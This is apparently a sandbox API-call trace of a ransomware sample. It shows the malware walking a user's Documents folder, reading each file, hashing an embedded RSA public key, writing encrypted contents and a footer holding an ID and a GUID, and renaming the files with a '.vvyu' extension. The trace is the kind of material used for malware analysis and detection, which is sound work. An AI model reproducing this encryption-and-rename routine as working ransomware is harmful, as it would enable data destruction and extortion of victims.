[0193.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95890 | out: hHeap=0x620000) returned 1 [0193.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.405] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xf55b, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xf55b, lpOverlapped=0x0) returned 1 [0193.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.407] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xf560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.407] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.408] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.409] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.409] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.409] CloseHandle (hObject=0x568) returned 1 [0193.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea0a68 [0193.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.411] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\5h1GruRzAZNE.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\5h1grurzazne.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\5h1GruRzAZNE.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\5h1grurzazne.docx.vvyu")) returned 1 [0193.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.412] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.415] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fcb7660, ftCreationTime.dwHighDateTime=0x1d89d98, ftLastAccessTime.dwLowDateTime=0x835f4b40, ftLastAccessTime.dwHighDateTime=0x1d89e37, ftLastWriteTime.dwLowDateTime=0x835f4b40, ftLastWriteTime.dwHighDateTime=0x1d89e37, nFileSizeHigh=0x0, nFileSizeLow=0x11f24, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6LeN1-BfLiBS.rtf", cAlternateFileName="6LEN1-~1.RTF")) returned 1 [0193.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95890 [0193.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95890 | out: hHeap=0x620000) returned 1 [0193.416] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\6LeN1-BfLiBS.rtf") returned=".rtf" [0193.416] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\6LeN1-BfLiBS.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\6len1-bflibs.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.417] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=73508) returned 1 [0193.417] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.421] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x11efe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.421] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.423] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.423] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x11f24, lpOverlapped=0x0) returned 1 [0193.425] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.425] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.425] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.425] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.426] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.426] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.426] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.426] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.426] GetLastError () returned 0x0 [0193.427] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.427] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.427] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.427] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.427] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11f20) returned 0x2ea79b0 [0193.428] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95890 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e958d8 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93870 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.429] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93870 [0193.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93828 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93810 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.431] GetCurrentThreadId () returned 0x66c [0193.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f0b0 [0193.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.432] GetCurrentThreadId () returned 0x66c [0193.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93870 [0193.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93828 [0193.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93888 [0193.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b38 [0193.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93810 [0193.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0193.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 